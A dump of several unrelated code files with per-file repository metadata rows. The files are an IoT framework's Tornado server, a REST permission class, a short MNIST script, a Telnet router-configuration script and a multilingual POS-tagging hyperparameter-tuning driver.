"ByOriginDirection",
]
| 22.033333 | 108 | 0.665658 | 73 | 661 | 5.972603 | 0.726027 | 0.022936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026104 | 0.246596 | 661 | 29 | 109 | 22.793103 | 0.849398 | 0.618759 | 0 | 0 | 0 | 0 | 0.086294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.142857 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb6327d7e4cb1ae556990fbbdbb879671eea3d2 | 5,479 | py | Python | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | wukong/master/dbserver.py | fakewen/Monitoring-branch | cb5516d7cd4eaac3f88f32dc37fdff622f3a6655 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | #!/usr/bin/python
# vim: ts=2 sw=2 expandtab
# author: Penn Su
import dateutil.parser
from gevent import monkey; monkey.patch_all()
import gevent
import serial
import platform
import os, sys, zipfile, re, time
import tornado.ioloop, tornado.web
import tornado.template as template
import simplejson as json
from jinja2 import Template
import logging
import hashlib
from threading import Thread
import traceback
import StringIO
import shutil, errno
import datetime
from datetime import date, timedelta
import glob
import copy
import fcntl, termios, struct
from types import *
import tornado.options
tornado.options.define("appdir", type=str, help="Directory that contains the applications")
tornado.options.parse_command_line()
from configuration_db import *
if WKPFCOMM_AGENT == "ZWAVE":
try:
import pyzwave
m = pyzwave.getDeviceType
except:
print "Please install the pyzwave module in the wukong/tools/python/pyzwave by using"
print "cd ../tools/python/pyzwave; sudo python setup.py install"
sys.exit(-1)
import pymongo
import tornado.options
if(MONITORING == 'true'):
try:
from pymongo import MongoClient
except:
print "Please install python mongoDB driver pymongo by using"
print "easy_install pymongo"
sys.exit(-1)
try:
mongoDBClient = MongoClient(MONGODB_URL)
except:
print "MongoDB instance " + MONGODB_URL + " can't be connected."
print "Please install the mongDB, pymongo module."
sys.exit(-1)
tornado.options.parse_command_line()
#tornado.options.enable_pretty_logging()
IP = sys.argv[1] if len(sys.argv) >= 2 else '127.0.0.1'
landId = 100
node_infos = []
from make_js import make_main
from make_fbp import fbp_main
def import_wuXML():
make_main()
def make_FBP():
test_1 = fbp_main()
test_1.make()
wkpf.globals.location_tree = LocationTree(LOCATION_ROOT)
def initializeVirtualNode():
# Add the server as a virtual Wudevice for monitoring
wuclasses = {}
wuobjects = {}
# 1 is by default the network id of the controller
node = WuNode(1, '/' + LOCATION_ROOT, wuclasses, wuobjects, 'virtualdevice')
wuclassdef = WuObjectFactory.wuclassdefsbyid[44]
wuobject = WuObjectFactory.createWuObject(wuclassdef, node, 1, False)
wkpf.globals.virtual_nodes[1] = node
# using cloned nodes
def rebuildTree(nodes):
nodes_clone = copy.deepcopy(nodes)
wkpf.globals.location_tree = LocationTree(LOCATION_ROOT)
wkpf.globals.location_tree.buildTree(nodes_clone)
flag = os.path.exists("../LocalData/landmarks.txt")
if(flag):
wkpf.globals.location_tree.loadTree()
wkpf.globals.location_tree.printTree()
# Helper functions
def setup_signal_handler_greenlet():
logging.info('setting up signal handler')
gevent.spawn(wusignal.signal_handler)
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
def copyAnything(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
exc_type, exc_value, exc_traceback = sys.exc_info()
print traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def getAppIndex(app_id):
# make sure it is not unicode
app_id = app_id.encode('ascii','ignore')
for index, app in enumerate(wkpf.globals.applications):
if app.id == app_id:
return index
return None
def delete_application(i):
try:
shutil.rmtree(wkpf.globals.applications[i].dir)
wkpf.globals.applications.pop(i)
return True
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
print traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
return False
def load_app_from_dir(dir):
app = WuApplication(dir=dir)
app.loadConfig()
return app
def update_applications():
logging.info('updating applications:')
application_basenames = [os.path.basename(app.dir) for app in wkpf.globals.applications]
for dirname in os.listdir(APP_DIR):
app_dir = os.path.join(APP_DIR, dirname)
if dirname.lower() == 'base': continue
if not os.path.isdir(app_dir): continue
logging.info('scanning %s:' % (dirname))
if dirname not in application_basenames:
logging.info('%s' % (dirname))
wkpf.globals.applications.append(load_app_from_dir(app_dir))
application_basenames = [os.path.basename(app.dir) for app in wkpf.globals.applications]
class idemain(tornado.web.RequestHandler):
def get(self):
self.content_type='text/html'
self.render('templates/ide.html')
# List all uploaded applications
class main(tornado.web.RequestHandler):
def get(self):
print "[WEB PORT]= %d" %(MONITORING_BUFSIZE)
getComm()
self.render('templates/application.html', connected=wkpf.globals.connected)
settings = dict(
static_path=os.path.join(os.path.dirname(__file__), "static"),
debug=True
)
ioloop = tornado.ioloop.IOLoop.instance()
wukong = tornado.web.Application([
(r"/", main),
(r"/ide", idemain),
(r"/main", main),
], IP, **settings)
logging.info("Starting up...")
setup_signal_handler_greenlet()
WuClassLibraryParser.read(COMPONENTXML_PATH)
initializeVirtualNode();
#WuNode.loadNodes()
update_applications()
import_wuXML()
make_FBP()
wukong.listen(MASTER_PORT)
if __name__ == "__main__":
ioloop.start()
| 27.258706 | 94 | 0.72203 | 732 | 5,479 | 5.269126 | 0.363388 | 0.037075 | 0.035779 | 0.029816 | 0.151932 | 0.136375 | 0.118745 | 0.094374 | 0.094374 | 0.094374 | 0 | 0.006806 | 0.168644 | 5,479 | 200 | 95 | 27.395 | 0.839956 | 0.05877 | 0 | 0.176471 | 0 | 0 | 0.111176 | 0.020019 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.20915 | null | null | 0.065359 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcbf89d16af8b8207c6990c30ee128a79effbc4f | 963 | py | Python | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 418 | 2017-10-05T05:52:49.000Z | 2022-03-24T09:50:06.000Z | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 1,049 | 2017-09-16T09:34:55.000Z | 2022-03-23T16:13:04.000Z | src/pretalx/api/permissions.py | lili668668/pretalx | 5ba2185ffd7c5f95254aafe25ad3de340a86eadb | [
"Apache-2.0"
] | 155 | 2017-10-16T18:32:01.000Z | 2022-03-15T12:48:33.000Z | from rest_framework.permissions import SAFE_METHODS, BasePermission
class ApiPermission(BasePermission):
def _has_permission(self, view, obj, request):
event = getattr(request, "event", None)
if not event: # Only true for root API view
return True
if request.method in SAFE_METHODS:
read_permission = getattr(view, "read_permission_required", None)
if read_permission:
return request.user.has_perm(read_permission, obj)
return True
write_permission = getattr(view, "write_permission_required", None)
if write_permission:
return request.user.has_perm(write_permission, obj)
return False
def has_permission(self, request, view):
return self._has_permission(view, getattr(request, "event", None), request)
def has_object_permission(self, request, view, obj):
return self._has_permission(view, obj, request)
| 37.038462 | 83 | 0.678089 | 113 | 963 | 5.566372 | 0.327434 | 0.082671 | 0.050874 | 0.063593 | 0.193959 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244029 | 963 | 25 | 84 | 38.52 | 0.864011 | 0.028037 | 0 | 0.105263 | 0 | 0 | 0.063169 | 0.052463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.052632 | 0.105263 | 0.631579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
fcc1a1236f02872e188e0996c48dca2fa8535f2a | 471 | py | Python | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | za/minstData/test.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | #%%
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import cv2
import numpy as np
import shutil
import random
from zipfile import ZipFile
rootPath = '..\..\dataAndModel\data\mnist\\'
for file in ["train", "test"]:
path = rootPath + file
print(os.listdir(path))
# %%
image_paths = [rootPath + 'train\\' + file for file in os.listdir(rootPath + 'train') ]
# %%
image_paths
# %%
image = cv2.imread(image_paths[0])
# %%
image.shape
# %%
image_paths[0]
# %%
| 17.444444 | 88 | 0.656051 | 63 | 471 | 4.809524 | 0.507937 | 0.132013 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012788 | 0.169851 | 471 | 26 | 89 | 18.115385 | 0.762148 | 0.042463 | 0 | 0 | 0 | 0 | 0.166667 | 0.06982 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fccd89561bcf68c7f9ec8902df57d34730dab901 | 1,021 | py | Python | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | Python_Network_Automation/input_num_ports/input_port_num.py | yasser296/Python-Projects | eae3598e2d4faf08d9def92c8b417c2e7946c5f4 | [
"MIT"
] | null | null | null | import getpass
import telnetlib
port_num = str(input("Enter the Number of Port and type: "))
HOST = "10.1.1.1"
user = input("\nEnter The Username: ")
password = getpass.getpass()
tn = telnetlib.Telnet(HOST)
tn.read_until(b"Username: ")
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.write(b"enable \n")
tn.write(b"123\n")
tn.write(b"config t \n")
tn.write(b"hostname " + user.encode('ascii') + b"\n")
tn.write(b"banner motd #Hello!# \n")
tn.write(b"interface " + str(port_num).encode('ascii') + b"\n")
# tn.write(b"interface s2/0 \n")
tn.write(b"no shutdown \n")
tn.write(b"ip address 10.1.2.1 255.255.255.0 \n")
tn.write(b"exit \n")
tn.write(b"exit \n") # To exit from Global Configration mode
tn.write(b"exit \n") # To exit from execuite mode so it will close the Session
tn.write(b"exit \n") # To exit from the terminal (cmd)
print("\nDone")
input("Just Press Enter To Exit!")
| 26.179487 | 79 | 0.641528 | 179 | 1,021 | 3.636872 | 0.363128 | 0.16129 | 0.159754 | 0.152074 | 0.3149 | 0.22427 | 0.202765 | 0.105991 | 0 | 0 | 0 | 0.029586 | 0.17238 | 1,021 | 38 | 80 | 26.868421 | 0.740828 | 0.152791 | 0 | 0.153846 | 0 | 0 | 0.351582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.192308 | 0.076923 | 0 | 0.076923 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fcd03cda24a62b52462ec71d4e75a58d63dacc27 | 22,521 | py | Python | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | 2 | 2021-04-27T19:56:28.000Z | 2021-08-19T05:34:37.000Z | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | 5 | 2021-05-03T14:40:33.000Z | 2021-05-03T14:40:34.000Z | transformers/script_tune_multi_pos.py | rizwan09/NLPDV | 2fa05421319db106e7a2befe6c3720a9c136c292 | [
"MIT"
] | null | null | null | import os, pdb
# ______________________________________NLPDV____________________________________
# _______________________________________________________________________
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from transformers import *
import _pickle as pkl
import shutil
import numpy as np
from tqdm import trange, tqdm
# _______________________________________________________________________
# ______________________________________NLPDV____________________________________
#gpu 0,2 on NLP9 are culprit gpu 3,4 on nlp8
CUDA_VISIBLE_DEVICES = [0,1,3,4,5,6,7]
BASE_DATA_DIR = '/local/rizwan/UDTree/'
run_file = './examples/run_multi_domain_pos.py'
model_type = 'bert'
train_model_name_or_path = 'bert-base-multilingual-cased' # 'bert-large-uncased-whole-word-masking'
do_lower_case = False
num_train_epochs = 4.0
num_eval_epochs = 1.0
per_gpu_eval_batch_size = 32
per_gpu_train_batch_size = 32
learning_rate = 5e-5
max_seq_length = 128
fp16 = True
overwrite_cache = False
evaluate_during_training = True
#batch sizes: 8, 16, 32, 64, 128 (for max seq 128, max batch size is 32)
#learning rates: 3e-4, 1e-4, 5e-5, 3e-5, 2e-5
'''
Runs:
'''
ALL_EVAL_TASKS = [
'UD_ARABIC',
'UD_BASQUE',
'UD_BULGARIAN',
'UD_CATALAN',
'UD_CHINESE',
'UD_CROATIAN',
'UD_CZECH',
'UD_DANISH',
'UD_DUTCH',
'UD_ENGLISH',
'UD_FINNISH',
'UD_FRENCH',
'UD_GERMAN',
'UD_HEBREW',
'UD_HINDI',
'UD_INDONESIAN',
'UD_ITALIAN',
'UD_JAPANESE',
'UD_KOREAN',
'UD_NORWEGIAN',
'UD_PERSIAN',
'UD_POLISH',
'UD_PORTUGUESE',
'UD_ROMANIAN',
'UD_RUSSIAN',
'UD_SERBIAN',
'UD_SLOVAK',
'UD_SLOVENIAN',
'UD_SPANISH',
'UD_SWEDISH',
'UD_TURKISH']
shpley_removals = {
'UD_ARABIC': [0, 3, 7, 8, 11, 13, 16, 21, 29],
'UD_BASQUE': [17, 19],
'UD_BULGARIAN': [3, 19], #[3, 13, 17, 19],
'UD_CATALAN': [ 0, 3, 17, 19, 20],
'UD_CHINESE':[5, 13, 20, 25, 26],
'UD_CROATIAN': [13, 17, 19],
'UD_CZECH': [13, 17, 19],
'UD_DANISH': [13],
'UD_DUTCH': [17,19],
'UD_ENGLISH': [0, 3, 5, 6, 8, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 29],
'UD_FINNISH': [13, 17, 19],
'UD_FRENCH': [17],
'UD_GERMAN': [ 17, 19], # Try with [3, 5, 16, 17, 19, 20]
'UD_HEBREW': [17],
'UD_HINDI': [ 0, 17, 19],
'UD_INDONESIAN': [ 0, 13, 17, 19],
'UD_ITALIAN': [ 5, 17, 19, 20],
'UD_JAPANESE': [19],
'UD_KOREAN': [ 0, 13, 19],
'UD_NORWEGIAN': [0, 13, 19],
'UD_PERSIAN': [4, 17, 19],
'UD_POLISH': [13, 17, 19],
'UD_PORTUGUESE': [17],
'UD_ROMANIAN': [ 13, 17, 19],
'UD_RUSSIAN': [ 13, 17, 19],
'UD_SERBIAN': [ 13, 17, 19],
'UD_SLOVAK': [ 13, 17, 19],
'UD_SLOVENIAN': [17],
'UD_SPANISH':[5, 17, 19],
'UD_SWEDISH':[17],
'UD_TURKISH': [13, 17, 19]
}
all_acc_shapley = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
all_acc_baseline = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
all_acc_baseline_s = {eval_task_name:[] for eval_task_name in ALL_EVAL_TASKS}
is_tune=True
BASELINES_S = 'baseline-s'
if not is_tune: num_train_epochs=4.0
for eval_task_name in ['UD_FINNISH']:
if len(shpley_removals[eval_task_name])<1: continue
for i in range(1):
seed = 43
np.random.seed(seed)
for is_few_shot in [False]:
best_shapley_learning_rate = None
best_shapley_per_gpu_train_batch_size = None
best_baseline_learning_rate = None
best_baseline_per_gpu_train_batch_size = None
best_baseline_s_learning_rate = None
best_baseline_s_per_gpu_train_batch_size = None
BEST_BASELINE_ACC = None
BEST_SHAPLEY_ACC = None
for is_Shapley in [ BASELINES_S,]:
best_learning_rate = None
best_per_gpu_train_batch_size = None
best_acc = -1
if BEST_BASELINE_ACC and BEST_SHAPLEY_ACC and BEST_BASELINE_ACC > BEST_SHAPLEY_ACC: continue
# _______________________________________________________________________
# ______________________________________NLPDV____________________________________
ALL_BINARY_TASKS = [
'UD_ARABIC',
'UD_BASQUE',
'UD_BULGARIAN',
'UD_CATALAN',
'UD_CHINESE',
'UD_CROATIAN',
'UD_CZECH',
'UD_DANISH',
'UD_DUTCH',
'UD_ENGLISH',
'UD_FINNISH',
'UD_FRENCH',
'UD_GERMAN',
'UD_HEBREW',
'UD_HINDI',
'UD_INDONESIAN',
'UD_ITALIAN',
'UD_JAPANESE',
'UD_KOREAN',
'UD_NORWEGIAN',
'UD_PERSIAN',
'UD_POLISH',
'UD_PORTUGUESE',
'UD_ROMANIAN',
'UD_RUSSIAN',
'UD_SERBIAN',
'UD_SLOVAK',
'UD_SLOVENIAN',
'UD_SPANISH',
'UD_SWEDISH',
'UD_TURKISH']
DOMAIN_TRANSFER = True
# _______________________________________________________________________
# ______________________________________NLPDV____________________________________
if eval_task_name in ALL_BINARY_TASKS: ALL_BINARY_TASKS.remove(eval_task_name)
if is_Shapley==BASELINES_S:
raddom_domains = np.random.choice(np.arange(len(ALL_BINARY_TASKS)), \
len(shpley_removals[eval_task_name]), replace=False)
learning_rates = [ 2e-5, 3e-5, 5e-5]
bz_szs = [ 16, 32]
for learning_rate in learning_rates:
for per_gpu_train_batch_size in bz_szs:
train_task_name = eval_task_name
if is_Shapley=='LOO': train_output_dir = 'temp/' + train_task_name + '_output_LOO_'+str(per_gpu_train_batch_size) + '_'+str(learning_rate) #+str(seed)+'/'
elif is_Shapley==True:
train_output_dir = 'temp/' + train_task_name + '_output_Shapley_'+str(per_gpu_train_batch_size) + '_'+str(learning_rate) #+str(seed)+'/'
elif is_Shapley == BASELINES_S:
train_output_dir = 'temp/' + train_task_name + '_output_baseline-s_' + str(
per_gpu_train_batch_size) + '_' + str(learning_rate) #+str(seed)+'/'
else:
train_output_dir = 'temp/' + train_task_name + '_output_baseline_'+str(per_gpu_train_batch_size) + '_'+str(learning_rate) #+str(seed)+'/'
eval_output_dir = train_output_dir +'/best'
train_data_dir = BASE_DATA_DIR
eval_data_dir = BASE_DATA_DIR
directory = eval_output_dir
if not os.path.exists(train_output_dir) :
os.makedirs(directory)
os.makedirs(os.path.join(directory, 'plots'))
if not os.path.exists(directory) :
os.makedirs(directory)
os.makedirs(os.path.join(directory, 'plots'))
def write_indices_to_delete(indices_to_delete_file_path, ids):
with open(indices_to_delete_file_path, "w") as writer:
print(f"***** Writing ids to {str(indices_to_delete_file_path)} *****", flush=True)
for id in ids:
writer.write("%s " % (id))
indices_to_delete_file_path = directory + '/indices_to_delete_file_path' + '.json'
if is_Shapley == True and eval_task_name != 'UD_TURKISH':
write_indices_to_delete(indices_to_delete_file_path, shpley_removals[eval_task_name])
if is_Shapley == BASELINES_S and eval_task_name != 'UD_TURKISH':
print('-eval_task_name: ', eval_task_name, flush=True)
print('raddom_removal_domains: ', raddom_domains,\
'shapley removals: ', shpley_removals[eval_task_name], flush=True)
write_indices_to_delete(indices_to_delete_file_path, raddom_domains )
# if is_Shapley == False and eval_task_name == 'UD_ENGLISH':
# write_indices_to_delete(indices_to_delete_file_path,\
# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 28, 29])
# else is_Shapley: continue
run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
for i in CUDA_VISIBLE_DEVICES[1:]:
run_command += ',' + str(i)
run_command += ' python '
if len(CUDA_VISIBLE_DEVICES) > 1: run_command += '-m torch.distributed.launch --nproc_per_node ' \
+ str(len(CUDA_VISIBLE_DEVICES))
run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
per_gpu_eval_batch_size) + \
' --per_gpu_train_batch_size=' + str(per_gpu_train_batch_size) + ' --learning_rate ' + str(learning_rate) \
+ ' --overwrite_output_dir '
if do_lower_case: run_command += '--do_lower_case '
if fp16: run_command += ' --fp16 '
if overwrite_cache:
run_command += ' --overwrite_cache '
if evaluate_during_training: run_command += ' --evaluate_during_training '
# For training:
train_run_command = run_command + ' --do_train --task_name ' + train_task_name + \
' --data_dir ' + train_data_dir + ' --output_dir ' + \
train_output_dir + ' --model_name_or_path ' + train_model_name_or_path
if is_Shapley: train_run_command += ' --indices_to_delete_file_path ' + indices_to_delete_file_path
if is_few_shot : train_run_command += ' --is_few_shot'
command = train_run_command + ' --num_train_epochs 1'
print(command, flush=True)
if not os.path.exists(os.path.join(eval_output_dir,"pytorch_model.bin")):
os.system(command)
# initial Eval on whole dataset
# For eval:
run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
run_command += ' python '
run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
per_gpu_eval_batch_size) + \
' --per_gpu_train_batch_size=' + str(
per_gpu_train_batch_size) + ' --learning_rate ' + str(learning_rate) \
+ ' --overwrite_output_dir '
if do_lower_case: run_command += '--do_lower_case '
if fp16: run_command += ' --fp16 '
if overwrite_cache:
run_command += ' --overwrite_cache '
if evaluate_during_training: run_command += ' --evaluate_during_training '
eval_run_command = run_command + ' --do_eval --task_name ' + eval_task_name + \
' --data_dir ' + eval_data_dir + ' --output_dir ' + eval_output_dir + \
' --model_name_or_path ' + eval_output_dir
command = eval_run_command
print(command, flush=True)
os.system(command)
try:
output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
with open(output_eval_file, "r") as reader:
for line in reader:
line = line.strip().split()
key = line[0]
value = line[-1]
if key in ['acc']:
acc = float(value)
except:
acc = 0
print('-'*100, flush=True)
print("Task: ", train_task_name, flush=True)
print("learning_rate: ", learning_rate, flush=True)
print("per_gpu_train_batch_size: ", per_gpu_train_batch_size, flush=True)
print("Acc: ", acc, flush=True)
print("Shapely: ", str(is_Shapley), flush=True)
print('-'*100, flush=True)
if is_Shapley==True:
all_acc_shapley[eval_task_name].append(acc)
elif is_Shapley==False:
all_acc_baseline[eval_task_name].append(acc)
else:
all_acc_baseline_s[eval_task_name].append(acc)
if acc>best_acc:
best_per_gpu_train_batch_size = per_gpu_train_batch_size
best_learning_rate = learning_rate
best_acc=acc
print('-'*100, flush=True)
print('-Task: ', eval_task_name, flush=True)
print('-is_Shapley: ', is_Shapley, flush=True)
print('-best lr: ', best_learning_rate, '\n-bz sz: ', best_per_gpu_train_batch_size, \
'\n-best acc: ', best_acc, '\n-all_acc_shapley: ', all_acc_shapley, \
'\n-all_acc_shapley_baseline_s: ',all_acc_baseline_s,'\n- all_acc_baseline: ', all_acc_baseline, flush=True)
print('-'*100, flush=True)
# For Test:
train_task_name = eval_task_name
if is_Shapley == 'LOO':
train_output_dir = 'temp/' + train_task_name + '_output_LOO_' + str(
best_per_gpu_train_batch_size) + '_' + str(
best_learning_rate) # +str(seed)+'/'
elif is_Shapley == True:
train_output_dir = 'temp/' + train_task_name + '_output_Shapley_' + str(
best_per_gpu_train_batch_size) + '_' + str(best_learning_rate) # +str(seed)+'/'
elif is_Shapley == BASELINES_S:
train_output_dir = 'temp/' + train_task_name + '_output_baseline-s_' + str(
best_per_gpu_train_batch_size) + '_' + str(best_learning_rate) # +str(seed)+'/'
else:
train_output_dir = 'temp/' + train_task_name + '_output_baseline_' + str(
best_per_gpu_train_batch_size) + '_' + str(best_learning_rate) # +str(seed)+'/'
eval_output_dir = train_output_dir + '/best/'
run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
for i in CUDA_VISIBLE_DEVICES[1:]:
run_command += ',' + str(i)
run_command += ' python '
if len(CUDA_VISIBLE_DEVICES) > 1: run_command += '-m torch.distributed.launch --nproc_per_node ' \
+ str(len(CUDA_VISIBLE_DEVICES))
run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
per_gpu_eval_batch_size) + \
' --per_gpu_train_batch_size=' + str(
best_per_gpu_train_batch_size) + ' --learning_rate ' + str(
best_learning_rate) \
+ ' --overwrite_output_dir '
if do_lower_case: run_command += '--do_lower_case '
if fp16: run_command += ' --fp16 '
if overwrite_cache:
run_command += ' --overwrite_cache '
if evaluate_during_training: run_command += ' --evaluate_during_training '
train_run_command = run_command + ' --do_train --task_name ' + train_task_name + \
' --data_dir ' + train_data_dir + ' --output_dir ' + \
train_output_dir + ' --model_name_or_path ' + train_model_name_or_path
# For eval:
run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
run_command += ' python '
run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
per_gpu_eval_batch_size) + \
' --per_gpu_train_batch_size=' + str(
best_per_gpu_train_batch_size) + ' --learning_rate ' + str(
best_learning_rate) \
+ ' --overwrite_output_dir '
if do_lower_case: run_command += '--do_lower_case '
if fp16: run_command += ' --fp16 '
if overwrite_cache:
run_command += ' --overwrite_cache '
eval_run_command = run_command + ' --do_predict --task_name ' + eval_task_name + \
' --data_dir ' + eval_data_dir + ' --output_dir ' + eval_output_dir + \
' --model_name_or_path ' + eval_output_dir
indices_to_delete_file_path = eval_output_dir + '/indices_to_delete_file_path' + '.json'
if is_Shapley: train_run_command += ' --indices_to_delete_file_path ' + indices_to_delete_file_path
command = train_run_command + ' --num_train_epochs ' + str(num_train_epochs)
print(command, flush=True)
os.system(command)
# initial Eval on whole dataset
command = eval_run_command
print(command, flush=True)
os.system(command)
output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
with open(output_eval_file, "r") as reader:
for line in reader:
line = line.strip().split()
key = line[0]
value = line[-1]
if key in ['acc']:
acc = float(value)
print('-' * 100, flush=True)
print("Task: ", train_task_name, flush=True)
print("best_learning_rate: ", best_learning_rate, flush=True)
print("best_per_gpu_train_batch_size: ", best_per_gpu_train_batch_size, flush=True)
print("BEST TEST Acc: ", acc, flush=True)
print("Shapely: ", str(is_Shapley), flush=True)
print('-' * 100, flush=True)
if is_Shapley==True:
best_shapley_learning_rate = best_learning_rate
best_shapley_per_gpu_train_batch_size = best_per_gpu_train_batch_size
BEST_SHAPLEY_ACC = acc
elif is_Shapley==BASELINES_S:
best_baseline_s_learning_rate = best_learning_rate
best_baseline_s_per_gpu_train_batch_size = best_per_gpu_train_batch_size
else:
best_baseline_learning_rate = best_learning_rate
best_baseline_per_gpu_train_batch_size = best_per_gpu_train_batch_size
BEST_BASELINE_ACC = acc
best_shapley_dir = 'temp/'+eval_task_name+'_output_Shapley_'+str(best_shapley_per_gpu_train_batch_size)+'_'+\
str(best_shapley_learning_rate)+'/best/'
gold = best_shapley_dir+'test_gold.txt'
shapley = best_shapley_dir+'test_predictions.txt'
baseline = 'temp/'+eval_task_name+'_output_baseline_'+str(best_baseline_per_gpu_train_batch_size)+'_'+\
str(best_baseline_learning_rate)+'/best/'+'test_predictions.txt'
baseline_s = 'temp/'+eval_task_name+'_output_baseline-s_'+str(best_baseline_s_per_gpu_train_batch_size)+'_'+\
str(best_baseline_s_learning_rate)+'/best/'+'test_predictions.txt'
print('-'*100, flush=True)
print('Boostrap paired test of Shapley woth baseline!', flush=True)
command = "python script_t_test.py "+ gold + ' '+ shapley + ' ' + baseline
print(command, flush=True)
print('-' * 50, flush=True)
os.system(command)
print('-' * 50, flush=True)
print('-' * 50, flush=True)
print('Boostrap paired test of Shapley woth baseline-s!', flush=True)
command = "python script_t_test.py " + gold + ' ' + shapley + ' ' + baseline_s
print(command, flush=True)
print('-' * 50, flush=True)
os.system(command)
print('-' * 100, flush=True)
